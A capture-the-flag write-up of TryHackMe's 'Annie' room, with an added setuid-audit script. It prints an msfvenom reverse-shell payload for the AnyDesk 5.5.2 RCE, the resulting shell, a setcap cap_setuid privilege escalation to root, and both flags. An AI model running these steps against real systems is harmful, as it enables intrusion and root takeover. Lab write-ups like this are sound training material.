Annie

Jan 11, 2023 · Jeff Soczek

Remote access comes in different flavors. Another TryHackMe free room, this one is classified as medium difficulty.

The first thing I try is to see if there is some web response. No answer when trying to reach it on port 80. Okay, I would run nmap anyway.


w1zard in try-hack-me/rooms/annie 
  nmap -Pn -p- -oA nmap-fullports-annie 10.10.92.77    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-11 17:35 -03
Nmap scan report for 10.10.92.77
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
7070/tcp  open  realserver
43353/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1082.16 seconds

Right, we can run the default script scan along with the service/version detection.


PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72d72534e807b7d96fbad6981aa317db (RSA)
|   256 721026ce5c53084b6183f87ad19e9b86 (ECDSA)
|_  256 d10e6da84e8e20ce1f0032c1448dfe4e (ED25519)
7070/tcp open  ssl/realserver?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after:  2072-03-10T20:04:30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I kinda wanted a version number, but let’s work with what we have in hand. Let me look for some exploits.


w1zard in try-hack-me/rooms/annie 
  searchsploit anydesk   
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation                         | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path                                              | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution                                              | linux/remote/49613.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Going straight for the RCE.


w1zard in try-hack-me/rooms/annie 
  searchsploit -m 49613  
  Exploit: AnyDesk 5.5.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49613
     Path: /usr/share/exploitdb/exploits/linux/remote/49613.py
    Codes: CVE-2020-13160
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/w1zard/Documents/labs/try-hack-me/rooms/annie/49613.py

A bit of inspection and, oh, great, there’s a link for a walkthrough. I just have to change the target IP and port and create a shellcode payload using msfvenom.


msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

The shellcode goes into the exploit, and the exploit does nothing. I tried running the exploit a couple of times, thought the machine was wonky and rebooted it. Executed the exploit a couple more times, nothing. Fvck. Changed absolutely nothing, ran the exploit a few more times…


connect to [10.13.3.36] from (UNKNOWN) [10.10.128.217] 45640

No logic, just repeat the same thing and maybe you’ll get a different result.


python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

annie@desktop:/home/annie$ cat user.txt
cat user.txt
THM{N0t_Ju5t_ANY_D3sk}

Now for the privilege escalation. The way I found was through setuid files owned by root.

find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;


annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;

< -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
-rwsr-xr-x 1 root root 10232 Nov 16  2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Jan 25  2022 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-- 1 root dip 378600 Jul 23  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar  2  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Jan 12  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Dec 14  2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 Jan 25  2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Jan 25  2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Jan 25  2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Jan 12  2022 /usr/bin/pkexec

setcap stands out from the list. Let me have a look at this.


Okay, you can force capabilities onto programs using setcap, and those programs can then be exploited by passing them malicious commands or arguments, which are then run as root. Thanks, HackTricks.
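As an added example (not code from the original post), the check a defender would want here: parse the `ls -al` lines that the `find / -perm -4000` command produced and flag any setuid-root binary that is not in an expected baseline. The baseline below is an assumed allow-list for a stock Ubuntu 18.04 desktop, and the sample lines are a constructed subset of the listing above.

```python
"""Audit a setuid-binary listing against an assumed baseline.

A setuid-root setcap lets any local user grant file capabilities
(such as cap_setuid) to an arbitrary binary, so it must not be in
the allow-list; the audit reports it as unexpected.
"""
import re

# Assumed allow-list of setuid-root paths normally present on Ubuntu 18.04.
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/fusermount", "/bin/umount",
    "/usr/sbin/pppd", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/xorg/Xorg.wrap", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/arping", "/usr/bin/newgrp", "/usr/bin/sudo",
    "/usr/bin/traceroute6.iputils", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/pkexec",
}

# One `ls -l` line: mode, link count, owner, group, size, three date fields, path.
LS_LINE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$"
)

def parse_ls(lines):
    """Yield (path, owner, mode) for every line that looks like `ls -l` output;
    shell prompts and the pty's wrapped command echo are skipped."""
    for line in lines:
        m = LS_LINE.match(line.strip())
        if m:
            yield m.group("path"), m.group("owner"), m.group("mode")

def unexpected_suid(lines, baseline=BASELINE):
    """Return paths that are setuid-root (owner root, 's' in the user-exec
    slot of the mode string) but absent from the baseline."""
    return [path for path, owner, mode in parse_ls(lines)
            if owner == "root" and mode[3] == "s" and path not in baseline]

# Constructed sample: a subset of the find output shown in the writeup.
SAMPLE = """\
annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \\;
-rwsr-xr-x 1 root root 10232 Nov 16  2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-- 1 root dip 378600 Jul 23  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 22520 Jan 12  2022 /usr/bin/pkexec
""".splitlines()

if __name__ == "__main__":
    for p in unexpected_suid(SAMPLE):
        print("unexpected setuid-root binary:", p)
```

Run on a live box by piping the real `find` output in and comparing against a baseline taken from a known-good image of the same distribution release.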


annie@desktop:/home/annie$ which python3
which python3
/usr/bin/python3
annie@desktop:/home/annie$ cp /usr/bin/python3 .
cp /usr/bin/python3 .
annie@desktop:/home/annie$ /sbin/setcap cap_setuid+ep /home/annie/python3
/sbin/setcap cap_setuid+ep /home/annie/python3
annie@desktop:/home/annie$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@desktop:/home/annie# cat /root/root.txt
cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}